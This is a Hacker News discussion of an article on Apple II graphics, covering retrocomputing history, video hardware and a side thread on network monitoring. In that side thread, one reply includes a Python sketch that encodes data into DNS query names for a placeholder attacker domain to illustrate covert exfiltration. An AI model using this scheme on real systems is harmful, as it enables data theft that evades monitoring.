Apple II graphics: More than you wanted to know (nicole.express)
168 points by GavinAnderegg on June 28, 2024 | hide | past | favorite | 66 comments


> "Randomly reading from various memory addresses might give the modern programmer some concern about security holes, maybe somehow reading leftover data on the bus an application shouldn't be able to see. On the Apple II, there is no protected memory at all though, so don't worry about it!"

Funnily enough, protected memory (sort of) arrived with the Apple III a couple of years later in 1980 and it was met with complete disdain from the developer community ("Stop trying to control my life, Apple!").

Apple III ROM, hardware, and kernel memory wasn't meant to be directly accessible from the application's address space. The purpose was to increase system stability and to provide a backward-compatible path for future hardware upgrades, but most users and developers didn't see the point and found ways around the restrictions.

Later, more-successful systems used a kinder, gentler approach (please use the provided firmware/BIOS interfaces).


The Apple /// is a master class on what NOT to do when designing a computer. Apple still owes us an 8-bit Apple IV computer as an apology for the ///.

The best feature is the dual speed arrows - press and they’ll auto repeat. Press harder and they’ll repeat faster.


Some other hardware features were very good for the time. It gets a lot of heat for the initial reliability issues, but they were eventually solved. They also limited the Apple ][ emulation to 2+ features, so no 80 columns, and that was probably a mistake. On the other hand the good features were:

- Profile hard disk (but it would have been better if you could boot from it).

- Movable zero page, so the OS and the application each had their own zero page.

- As mentioned, 80-column text and high-resolution graphics.

- Up to 512k addressable RAM, either through indirection or bank switching.

It was probably the most ambitious 6502 based computer, until the 65816 based IIgs came along. And SOS was better than ProDOS.


I remember going to Computerland circa 1981 and they had an Apple /// that they refused to demo for anyone because they were afraid it would burn up. Whatever else might have been wrong about the ///, the /// just plain didn't work reliably.


AFAIK, the ///+ solved most of the problems with the ///, but it failed so badly in the market I’m still looking for one to buy for a reasonable price (I want to try to make it do 384x560 graphics, arguably possible with its interlaced mode).


There's no way a 6502 machine could have beat Z-80 based CP/M machines for business. Not only did the 6502 lack many addressing modes, but it had hardly any registers so you'd struggle even to emulate addressing modes. There was a "direct page" of just 256 bytes that you hypothetically could use to store variables but fitting that into the memory model of languages like C where locals are stack allocated or should look like they are stack allocated is tough.

It was almost impossible to write compilers for languages like Pascal and FORTRAN for the 6502 without resorting to virtual machine techniques like

https://en.wikipedia.org/wiki/SWEET16

or

https://en.wikipedia.org/wiki/UCSD_Pascal

The latter was atrociously slow and contributed to the spectacle of professors who thought BASIC was brain-damaged advocating terrible alternatives. Commodore added a 6809 to the PET to make a machine you could program in HLLs.
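The virtual-machine trick is easy to illustrate with a toy interpreter: the compiler targets a pretend machine with sixteen 16-bit registers (as SWEET16 had), and a small native loop dispatches each opcode. A minimal sketch in Python - the opcodes and encodings here are invented for illustration, not SWEET16's actual instruction set:

```python
# Toy bytecode VM in the spirit of SWEET16: you pay an interpretation
# cost per opcode in exchange for 16-bit operations the 8-bit CPU lacks.
SET, ADD, SUB, HALT = range(4)  # invented opcodes, not SWEET16's

def run(program):
    regs = [0] * 16              # sixteen 16-bit registers
    pc = 0
    while True:
        op = program[pc]
        if op == HALT:
            return regs
        if op == SET:            # SET r, lo, hi -> r = 16-bit literal
            r, lo, hi = program[pc+1:pc+4]
            regs[r] = lo | (hi << 8)
            pc += 4
        elif op == ADD:          # ADD rd, rs -> rd += rs (mod 2^16)
            rd, rs = program[pc+1:pc+3]
            regs[rd] = (regs[rd] + regs[rs]) & 0xFFFF
            pc += 3
        elif op == SUB:          # SUB rd, rs -> rd -= rs (mod 2^16)
            rd, rs = program[pc+1:pc+3]
            regs[rd] = (regs[rd] - regs[rs]) & 0xFFFF
            pc += 3

# A 16-bit add in three "instructions" instead of many 8-bit ones:
prog = [SET, 0, 0x34, 0x12,   # R0 = 0x1234
        SET, 1, 0x01, 0x00,   # R1 = 1
        ADD, 0, 1,            # R0 += R1
        HALT]
```

The win for a compiler is that every 16-bit operation becomes one compact bytecode instead of a sprawl of 8-bit instruction sequences; the cost is the dispatch loop on every instruction, which is why these systems were slow.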


The Apple II was a wildly popular business machine by any measure. Visicalc was an Apple app.

Everyone knows the 6502 is a lousy compiler target particularly if all you understand about compilers is 'what C expects', or at least they did once that became relevant. Those of us there at the time weren't harping on HLL support, since people weren't writing their apps in a HLL but in asm, even on the Z-80.


The big issue with the 6502 is being unable to pass lots of parameters on the hardware stack, but that's all there is to it - one approach was to create a parameter stack independent of the hardware stack: you'd just push the size of the called routine's memory space to the hardware stack, using 3 bytes per call for up to 256 bytes' worth of parameters and local variables.
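My reading of that scheme, sketched in Python (the frame-size record and the 256-byte limit are from the comment above; everything else is illustrative):

```python
# Sketch of a software parameter stack: args and locals live on a
# separate stack, while per call only a small fixed record (here, the
# frame size) goes on the hardware stack.
class SoftStacks:
    def __init__(self):
        self.params = []   # software stack: args + locals
        self.hw = []       # hardware stack: one frame-size entry per call

    def call(self, args, n_locals=0):
        frame = len(args) + n_locals
        assert frame <= 256, "6502-style limit: at most one page per frame"
        self.params.extend(args)
        self.params.extend([0] * n_locals)   # zero-init locals
        self.hw.append(frame)                # ~3 bytes on a real 6502

    def ret(self):
        frame = self.hw.pop()                # pop the frame size...
        del self.params[len(self.params) - frame:]   # ...discard the frame

s = SoftStacks()
s.call([10, 20], n_locals=1)   # outer call: 2 args + 1 local
s.call([30])                   # nested call: 1 arg
s.ret()
s.ret()
```

The hardware stack only ever holds small fixed-size call records, so the 6502's single 256-byte page is enough for deep call chains even when frames are large.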


I remember seeing C on CP/M circa 1984, the Z80 had compiled BASICs, multiple Pascal implementations including Turbo Pascal although assembly was common. It was still common by the late 1980s on the 8086 platform.


A lot of Apple IIs, mine included, got Z-80 coprocessors for running CP/M. The Z-80 card was, IIRC, the first Microsoft hardware product. Along with the Videx 80-column card, it was the most popular expansion for the Apple II plus computers in Brazil as I grew up.

I ran my II+ in dual-head mode, with a long-persistence green phosphor monitor on the Videx and a color TV on the main board output.


The /// did have a nice OS -- the perhaps unfortunately named SOS, which was an improvement over the original Apple DOS and was the basis for ProDOS which replaced Apple DOS on the 64K and greater Apple II models.


> unfortunately named SOS

I’m sure whoever named it had a painful awareness of what would be the ultimate end of the ///.


I've always wanted a force-sensitive keyboard; the harder you hit a key, the more urgently it handles it. Auto-bolded text? Priority of a CLI command proportional to how hard you hit return?


Microsoft did experiment with that some time ago, but the /// was simpler - it was two switches, one actuated at one pressure and the other requiring more force to actuate.

I think this kind of switch is still made.


It's nifty for music production too, when using "musical typing"


The first generation of home computers used discrete components for the display controller, which is crazy expensive because you need lots of counters, comparators, wide data paths, etc., and that adds up to a lot of parts.

Second generation machines like the VIC-20 and TRS-80 Color Computer used ASICs for the display controller. Apple thought the ][ was on borrowed time and had no idea how long it would last, so they were slow to come out with the ][e, which was cost-reduced.


Do you know of more home computers that did the display controller like the Apple II did?

I think it may be inspiring to people who make their own DIY CPUs.


I think the Commodore PET used discrete TTL as well. This is first generation stuff for home computers, the costs are so high that manufacturers were highly incentivized to make graphics chips as soon as the technology was viable, right around 1979 or 1980. Anything made from then on is going to have a dedicated graphics chip of some kind just for the cost savings.


So did the other member of the "trinity", the TRS-80 model I.

My mental picture is that the kind of display controller I'd like to build is about two large breadboards stuffed with 54xx chips. Such a thing is a bit simpler than a minimal CPU but not that much simpler because you need the stuff to interface with memory. I'd probably want to buy an oscilloscope and/or logic analyzer but maybe I could run it slow and use an AVR-8 Arduino to run test sequences.

Almost everybody who builds throwback computers today uses either an FPGA or a microcontroller for the display controller. For instance

https://github.com/fdivitto/FabGL

is a highly flexible controller implemented for the ESP32 which can do tile-based graphics and sprites for games but also emulate an ANSI terminal. This is used in this SBC

https://www.olimex.com/Products/Retro-Computers/AgonLight2/o...

which I am going to highly recommend because this machine is compatible with the old Z80 machines but has a real 24 bit mode with 24 bit registers and also performs an order of magnitude better than any Z80 machine did back in the day.

Modern systems usually avoid the unified memory model that was popular back in the day but that also usually held back the performance of the CPU because one way or another the VDC was stealing cycles. The AgonLight board communicates with the display controller through a serial port, for instance.

This thing

http://www.commanderx16.com/

has a memory mapped register for the address in video RAM the CPU wants to read/write and another for the data. The address register will auto-increment when you access the data register, so you can read or write video RAM at high speed just by repeatedly accessing the data register. The CX-16 uses an FPGA as a display controller

https://github.com/X16Community/x16-docs/blob/master/X16%20R...
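The address/data register pair is easy to model. A toy Python version (the register layout and sizes here are invented for illustration - see the X16 docs above for the real FPGA interface):

```python
# Toy model of an auto-incrementing video data port: writing the data
# port stores to video RAM at the current address, then bumps the
# address, so a tight loop can stream bytes without ever touching the
# address register again.
class VideoPort:
    def __init__(self, size=2048, step=1):
        self.vram = bytearray(size)
        self.addr = 0          # "memory-mapped" address register
        self.step = step       # auto-increment amount

    def write_data(self, byte):   # models a store to the data register
        self.vram[self.addr] = byte & 0xFF
        self.addr = (self.addr + self.step) % len(self.vram)

    def read_data(self):          # models a load from the data register
        byte = self.vram[self.addr]
        self.addr = (self.addr + self.step) % len(self.vram)
        return byte

vp = VideoPort()
vp.addr = 0x100          # set the start address once...
for b in b"HELLO":       # ...then just hammer the data port
    vp.write_data(b)
```

On a 6502 this matters because the inner loop collapses to a load plus a single store to one fixed address - no 16-bit pointer arithmetic per byte.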


> " I'd probably want to buy an oscilloscope and/or logic analyzer but maybe I could run it slow and use an AVR-8 Arduino to run test sequences."

that's literally what I want to do because I'm too broke for either lol

you can squeeze more out of an Arduino's ADC by using its timers and interrupts instead of calling analogRead() in a loop:

https://www.instructables.com/Girino-Fast-Arduino-Oscillosco...

https://digibird1.wordpress.com/arduino-as-a-5m-sample-oscil...


> two large breadboards stuffed with 54xx chips

There's no need for mil-spec chips for this. Waste of money.


PET used a clone of the Motorola 6845 (also found in MDA and CGA adapters for the IBM PC).

https://en.m.wikipedia.org/wiki/Motorola_6845

https://retrocomputing.stackexchange.com/questions/7117/how-...


The first couple of models used TTLs for the video circuit. These were replaced with the 6845 later on.


See also

https://en.m.wikipedia.org/wiki/List_of_home_computers_by_vi...

Note Don Lancaster's technique used for video in some computers

https://www.tinaja.com/ebooks/cvcb1.pdf

such as

https://en.wikipedia.org/wiki/ZX80

In some strange sense this is like using a microcontroller to implement a CRTC except you're using the main CPU to do the work.


A lot of the Apple video is based on the book The TV Typewriter Cookbook, or something like that, by Don Lancaster.


Exactly. I came here to say that. The amazing thing is Lancaster wrote that book before there was a PC of any kind to hook up to. But he showed very clearly how to generate NTSC monochrome video with a bucket of TTL chips. Such good times and good memories. SWTPC sold a kit of that TV Typewriter that I built. Not only Apple and SWTPC but Sol and no doubt others basically cloned Lancaster's design.


The discrete hardware part of the Apple II is a fascinating window into 1970s hobbyist electronics. In the flashing text mode, you might think the flashing text (also used for the cursor) is done in software or something. But no, it's a 555 timer gating off the video signal for that particular character.


This reminds me of when my grandpa told me the clicking we hear when we turn on a turn signal is from the old days when a cover used to visibly/audibly "click"/close over the light, mimicking a blinking effect.


I always thought it was one of the many relays under the dash.


I think your grandpa was messing with you. Flashing turn signals and the click sound came with a 1938 invention which Buick started putting into cars in 1939.

There were other turn signal approaches used before then, though not all cars had turn signals. Some of those approaches were mechanical, but still don't really align to your grandpa's claim.

https://www.qualityplusautomotive.com/blog/2020/september/th...

https://www.cartalk.com/blogs/jim-motavalli/strange-true-his...


There's a video by Technology Connections all about turn signals:

https://www.youtube.com/watch?v=2z5A-COlDPk

Demonstrates thermal-based flashers as well as capacitor-based flashers. They are clicking because metal is moving and hitting metal.


Only skimmed the video, but did he get into why even the most modern cars, festooned with CanBus controlled light modules and LED almost everywhere, still have incandescent bulbs in the taillights? I'm pretty sure I've even seen those on electric cars.

Once upon a time, an "accidental" feature was that the thermal bimetallic flasher modules would flash much faster if the load was lower. So if your turn indicator flashed fast, you knew that one of the bulbs was out. I've seen this fairly recently; is it "designed in" to modern turn signal systems even though the bimetallic flasher units are long gone? And is that why there's still an incandescent bulb back there - because it's the easiest to monitor for not being functional by just watching the current draw?

Also once upon a time, you could pull out the thermal bimetallic flasher unit and replace it with an "electronic" one consisting of a transistor, a couple of passives, and a relay. Those made a very satisfying loud "CLICK CLACK" kind of noise that was impossible to miss. In my modern car, I'm pretty sure the tick tock sound is synthetic, but it's also quiet enough that, at least at my age, it's easy to miss.


I think these links should be labeled with NSFDAPFAW (Not Safe For Doing Anything Productive For A While)


This might be a good moment to drop a thing I made last year but never shared the link for. It's a bitmap editor that outputs Apple ][ shape tables.

https://robterrell.github.io/shape_table_maker/shape_draw.ht...

Apple ][ shape tables were a rarely-used vector drawing technique -- rarely used because they were fairly slow to render and there wasn't great tooling for making them. High level of difficulty plus poor results... it was almost as easy to write blitting code, even with the odd Apple ][ video memory layout, so most games ended up doing that instead.

Anyway, if you are curious about shape tables, here's a thing for you.
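From my memory of the Applesoft format (check the Applesoft BASIC manual before trusting the details): each shape-table byte packs up to three vectors - section A (bits 0-2), B (bits 3-5), and C (bits 6-7). A and B each hold a plot flag plus a 2-bit direction (0=up, 1=right, 2=down, 3=left); C is move-only; trailing zero sections are skipped and an all-zero byte ends the shape. A hedged Python decoder:

```python
# Decode an Applesoft-style shape table into a list of plotted points.
# Format details are from memory and may be imperfect.
MOVES = {0: (0, -1), 1: (1, 0), 2: (0, 1), 3: (-1, 0)}  # up,right,down,left

def draw_shape(table, x=0, y=0):
    plotted = []
    for byte in table:
        if byte == 0:
            break                       # all-zero byte terminates the shape
        a, b, c = byte & 7, (byte >> 3) & 7, (byte >> 6) & 3
        sections = [(a & 3, a & 4)]     # (direction, plot flag)
        if b or c:                      # trailing zero sections are skipped
            sections.append((b & 3, b & 4))
        if c:
            sections.append((c, 0))     # section C never plots
        for direction, plot in sections:
            if plot:
                plotted.append((x, y))
            dx, dy = MOVES[direction]
            x, y = x + dx, y + dy       # always move after (optionally) plotting
    return plotted
```

You can see why rendering was slow: every plotted pixel costs bit-fiddling to unpack the vector before the Apple's already-awkward hi-res plot routine even runs.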


One thing I used shape tables for was for a fade-in effect. I would draw my spaceship one pixel at a time, choosing the next pixel at random. (I made a tool to help with this, or else it would have been too tedious!) The shape tables were rendered so slowly that it made the ship "materialize" in a cool effect. After this initial fade-in, I would render the ship more sensibly.

Other than this, I never found much use for shape tables.


I used them a lot for fonts. The Take-1 Programmer’s Toolkit was used extensively for animations in educational software back then.


I remember making shape tables manually in high school. Talk about a trip down memory lane.


Goodness me. I wrote a simple 2D flying game using potentiometers for steering and shape tables to draw the little airplanes. It was indeed very slow, but still fun.


Woz is one of the greatest engineers of the 20th century, and the Apple II demonstrates his talent. But his brilliance at simplifying things always straddles the line between optimized and overoptimized. The Disk II might be his greatest feat at doing more with less, while the video circuitry falls just into overoptimization, given the color fringing, NTSC dependence for color, and lack of lowercase. Integer BASIC is somewhere in the middle; great performance (especially given (or maybe because) Woz knew nothing about mainstream BASIC), but the code is so tightly written that it was easier for Apple to license Microsoft BASIC than to add floating-point code to Woz's work.


if you're excited about Apple II graphics, and also about the new Riven remake, but you don't have the VR hardware for Riven, you can try out the recently released Riven-for-Apple-II subset: http://deater.net/weave/vmwprod/riven/


> I'm going to break with my usual habit of ][ and use "Apple II" for the rest of the post.

It very slightly bothered me that "][plus" was typeset before this, but it was "IIe" and not "//e".


//e is only on the boot screen for the Apple IIe enhanced. The un-enhanced uses IIe.


I had to be sure there wasn't a Mandela effect. The logo plate had "//e" reflecting the legacy of the Apple ///. (Also seen on the //c). Then the later Platinum version went to "IIe" since it was in the Macintosh & IIgs era.

The "Apple ][" in the ROM I'd guess came from how hastily they had to regroup after the Apple /// wasn't successful.


> The un-enhanced uses IIe

It uses 'Apple ][', oddly enough.


> Many vintage computers are defined by their fonts.

But the article doesn't mention my favorite ASCII table ever, known as the "running man character set":

http://www.lazilong.com/apple_ii/a2font/readme.html

It includes open and closed apples, a sand clock, and elements to build GUIs: windows, tabs, scrollbars, and even a pointer!


It hurts so much to see how slowly that dragon head is animated in that Ultima intro. I remember a lot of really slow updating in games for the ][.


> Unfortunately, the Apple II doesn’t give the programmer any ability to know where in its cycle the video scanner is at any given time.

So there is no way to race the beam on an Apple II like an Atari 2600/VCS can?


You can race the beam - I've written many demos that use this. On the original Apple II you have to do something called "vapor lock" or "reading the floating bus": you draw a pattern to memory scanned by the video circuitry, then read an unmapped memory address and you get a "ghost" of the last value read by the video circuitry due to capacitance on the bus. You can then find the beam location, but from then on you have to cycle-count everything. Sather describes this in his book.
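A toy simulation of the idea (timings and memory layout here are invented for illustration - see Sather's "Understanding the Apple II" for the real details):

```python
# "Reading the floating bus": the video scanner fetches screen memory
# in a fixed cycle order, and a CPU read from an unmapped address
# returns whatever byte the scanner fetched last. Fill each scanline's
# bytes with a unique marker, read the floating bus, and you know
# where the beam is.
SCANLINES, BYTES_PER_LINE = 192, 40

# Every byte on line N carries the marker N.
screen = [[line & 0xFF] * BYTES_PER_LINE for line in range(SCANLINES)]

def floating_bus_read(cycle):
    # The scanner fetches one screen byte per cycle, top to bottom.
    line = (cycle // BYTES_PER_LINE) % SCANLINES
    col = cycle % BYTES_PER_LINE
    return screen[line][col]          # the "ghost" left on the bus

def beam_line(cycle):
    # One floating-bus read recovers the beam's scanline, because the
    # marker pattern makes every fetched byte identify its line.
    return floating_bus_read(cycle)
```

After this one synchronizing read, real code switches to pure cycle counting, since the Apple II gives you no further feedback about the beam.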


Don Lancaster had a software-only method for syncing to the video scan, called the Vaporlock, a play on "genlock", which is what TV production systems called their hardware for syncing to the scan when doing overlays.

Don's technique relied on the fact that the video hardware in the II line scanned memory that was outside the video frame. He put magic values in those extra bytes for each scan line, and his software could detect where the beam was on each line. (I've probably messed up the explanation; it's from memory of 40 years ago...)

The great thing is that you could mix video modes within a single scan line, allowing you to put text on the left edge of a HIRES graph. The downside is that the Apple can't do anything else, because his code is running in an exact timing loop to stay synced.

There were other solutions, but those were all hardware-based.


No, and there was no (easy) way to detect the vertical retrace. For a lot more on that topic have a look at the Apple II mouse card, they needed to synchronise with the video and did work out a software based way of doing it, but the final product added hardware to make it possible.


Glorious 7-bit graphics.


Relevant:

How Steve Wozniak Brought Color to Personal Computers https://www.youtube.com/watch?v=uCRijF7lxzI


> "Randomly reading from various memory addresses might give the modern programmer some concern about security holes, maybe somehow reading leftover data on the bus an application shouldn't be able to see. On the Apple II, there is no protected memory at all though, so don't worry about it! Loosen up! The hacker doesn't need a security hole if there's no security."

I miss computers that didn't have the capability to send all my important data to an unknown address in Belarus in the blink of an eye.

Maybe someone could design a modern desktop operating system whose outgoing network requests are batched and processed once a day, so you can look through the batch before letting it out. This would of course mean that applications must be designed to be extremely thrifty about what data they want to send, or users would simply ban them for making large opaque requests. No more telemetry, no more ad profile updates, etc.


A number of routers can capture every destination address your network has sent data to. You can then go through that list and mark 'safe' the ones where you know where they are going. After about a week you'll go days and days with no new addresses, but when one pops up it will be some IoT device or some visitor's phone or something.
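The workflow is simple enough to sketch: keep an allowlist of destinations you've already marked safe, and surface only addresses never seen before (the addresses below are placeholders):

```python
# Surface destination addresses not yet marked 'safe', deduplicated,
# in the order they first appear in the traffic log.
def new_destinations(log_addrs, allowlist):
    seen = set(allowlist)
    alerts = []
    for addr in log_addrs:
        if addr not in seen:
            alerts.append(addr)   # some IoT device or visitor's phone...
            seen.add(addr)
    return alerts

alerts = new_destinations(
    ["1.1.1.1", "8.8.8.8", "203.0.113.9", "8.8.8.8"],
    allowlist={"1.1.1.1", "8.8.8.8"},
)
```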


This may work for "casual" attempts, but if someone really wants to exfiltrate data, they can still do so in any number of ways. For example, they can send DNS queries to your usual DNS server, so you won't see a new address - and it will happily pass the query along to whatever the registered nameserver for the queried domain is.
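The DNS trick can be sketched without sending anything: arbitrary bytes get hex-encoded into query labels (DNS labels max out at 63 characters) under an attacker-controlled domain, and the victim's ordinary resolver forwards each lookup to that domain's authoritative nameserver. The domain name below is a placeholder; this only builds the query names:

```python
# Encode data into DNS query names for a domain whose nameserver the
# attacker controls. A sequence-number label lets the receiver
# reassemble chunks in order. Nothing here touches the network.
def exfil_names(data: bytes, domain="attacker.example", label_len=60):
    hexed = data.hex()
    chunks = [hexed[i:i + label_len]
              for i in range(0, len(hexed), label_len)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]

names = exfil_names(b"secret config contents")
```

Which is why destination-address monitoring alone can't catch this: every one of these queries goes to the resolver you already marked safe.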


Absolutely correct, any APT won't be caught this way. But script kiddies will be every day of the week. And if your browser is suddenly sending queries to China after that last add-on, it can be a good breadcrumb to follow up.

Security, like dressing for variable weather, is best done in layers.


That would be fun - requesting a web address and then having to wait for the batch review!

That would indeed be a return to the analog world.


Several years ago I worked on a system that operated quite like this. It used DTN (Delay/Disruption Tolerant Networking) and web proxies to allow really remote villages to get internet by bus or mule-drawn carriage or however they got supplies. You would make the request, it would be batched up with all of the other requests and handed off to the supply vehicle that came around every week or twice a week. That vehicle would eventually make it to a bigger city where they had real internet and it would spider out the requests a few layers deep (up to a low number of MB), then the vehicle would make another trek and it would populate a web cache in the villages so someone hitting the same URL would be served a slightly stale version of the content. It also had email so the person who made the request would get a mail stating that it was ready and give them the link.


This reminds me of back when e-mail clients would store your outgoing e-mails in the "outbox" waiting for the next time you dialed in. Nowadays networked software (and much of society) can't handle days of latency, only milliseconds, and I'm not sure that's a good thing.


Not just for dialup network access.

Microsoft Mail for PC Networks used two processes - one for the email client and one for sending/receiving email (aka the "email pump").

Since Windows 3.x used co-operative multitasking, only one process could run at a time; the email pump detected idle time and started sending/receiving email. Until the pump processed an email, the user could open the outbox, open outgoing emails, and modify and resend or cancel them.

A few years pass and Exchange 4.0 is about to ship.

But now the second process has been eliminated and emails are sent via RPC to the Exchange server. The user, though, has almost no chance to stop an email from being sent since the email spends almost no time in the outbox before the Exchange server sees and processes the outgoing email.

People actually grumbled about Exchange being too fast.

I took a look through the list of email message properties supported in Extended MAPI. One of them was a "time delay before sending" scalar, measured in seconds.

The Exchange email client (as seen in Win95, also supported on Win3.x and NT) supported extension DLLs. I created an extension DLL that let the user specify a time delay for outgoing emails, and listened for an "email send" notification and then set the user-specified "time delay before sending" property on the outgoing email.

Now outgoing emails would sit in the outbox for the user-specified amount of time before the Exchange server would process them.

Problem solved.

AFAIK the extension DLL was the only code that had set the "time delay before sending" property on emails. It worked the first time I ran the code. Someone did the appropriate testing.

Eventually Outlook 97 shipped. The extension still worked. But a later Outlook update broke the extension DLL. Finally Outlook added support for the "time delay before sending" property for outgoing emails - no need for an extension DLL anymore.


This will be one of the upsides of living on Mars.


Was this ever actually used in real life or was it an experiment only?


We handed it off to people who were supposed to deploy it, but I had to move on after that so I never got to see it live.

I kind of suspect that the window of usefulness was very short since cell towers were springing up even in really remote areas and they'd be a thousand times more useful even with just GPRS level connectivity.


I'd like to have a Slack bot that explains this situation:

"Thanks for contacting pavlov. Due to operating system limits, his reply to your message won't be published until 3pm tomorrow. Your patience is appreciated."

Would be a stress antidote.


Pluto will be prime real-estate for the people who don’t like interruptions.


Stallman uses an email script to read the web https://stallman.org/stallman-computing.html#:~:text=I%20gen....



